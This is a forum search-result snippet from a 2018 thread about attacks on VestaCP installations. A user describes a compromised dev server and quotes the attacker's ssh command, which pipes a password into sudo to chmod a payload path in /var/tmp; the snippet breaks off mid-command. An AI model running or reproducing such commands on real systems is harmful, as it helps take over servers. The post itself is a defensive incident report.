Search found 1 match
Search found 1 match • Page 1 of 1
- Mon Oct 08, 2018 2:20 pm
- Forum: General Discussion
- Topic: All VestaCP installations being attacked
- Replies: 230
- Views: 70506
My dev server got compromise as the password for admin user got changed, lucky I had the shell for admin user set to rssh so that attempt to run the payload in /var/tmp got blocked. Heres the attempted command run via ssh from ip:184.108.40.206 command: echo "9WlgVjGkot" | sudo -S -p "" chmod 0777 /va...